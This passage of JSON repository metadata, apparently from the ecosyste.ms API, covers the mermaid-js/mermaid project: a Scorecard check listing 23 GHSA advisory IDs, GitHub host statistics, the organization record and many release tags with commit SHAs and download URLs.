companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/